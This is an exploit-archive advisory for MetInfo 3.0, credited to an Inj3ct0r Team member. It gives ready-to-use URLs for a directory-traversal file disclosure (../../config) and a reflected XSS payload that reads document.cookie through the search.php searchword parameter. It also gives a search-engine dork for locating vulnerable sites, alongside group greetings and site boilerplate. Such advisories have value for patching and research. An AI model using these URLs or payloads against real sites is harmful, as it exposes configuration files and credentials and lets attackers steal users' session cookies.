Metinfo 3.0 cross site scripting file disclosure

2010.11.16
Credit: anT!-Tr0J4n
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: metinfo3.0 Mullti Vulnerability # Date : 10-11-2010 # Author : anT!-Tr0J4n # Version : 3.0 #DorK : Powered by MetInfo 3.0 # Home : www.Dev-PoinT.com : http://milw0rm.ws #Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com Vendor? : http://www.metinfo.cn/ #Greetz : Dev-PoinT.com ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l #special thanks to milw0rm.ws team : r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu ======================================================== metinfo3.0 source code disclosure Vulnerability ======================================================== [>] exploit -> [+] http://localhost/metinfo/templates/met001/../../ [file disclosure] EX : [+] http://localhost/metinfo/templates/met001/../../config ====================================================== [>] metinfo3.0 XSS Vulnerability ====================================================== [>] exploit -> XSS Vulnerability http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=[XSS] http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1<script>alert(document.cookie)</script> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] Site : Inj3ct0r.com [+] Support e-mail : submit[at]inj3ct0r.com [+] I'm anT!-Tr0J4n member from Inj3ct0r Team


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top